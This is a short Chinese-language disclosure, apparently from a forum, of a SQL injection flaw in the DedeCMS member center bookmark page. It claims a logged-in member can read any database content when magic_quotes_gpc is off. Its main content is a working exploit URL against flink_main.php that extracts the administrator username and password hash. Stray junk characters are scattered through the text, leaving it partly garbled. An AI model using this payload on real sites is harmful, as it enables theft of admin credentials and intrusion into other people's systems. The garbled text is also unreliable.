DedeCMS会员中心SQL注射漏洞
$ a" n0 D* \& H* f需要magic_quotes_gpc = Off& y" D* e4 B2 L4 O$ W
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
4 u% F o1 v7 b
/ ~4 E7 g4 W: v; ^DedeCMS会员中心书签管理SQL注射漏洞' S; a- l; T$ u' \1 O
成功利用该漏洞可获得管理员密码7 [+ W0 F1 L4 p' M
' `- w3 k+ D8 [ L: F会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
: b( F0 @9 p/ T" a, C8 [7 \ 8 T' o ^) D0 _" _' f1 C
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r( d( j7 o" g6 W; f4 a; }
|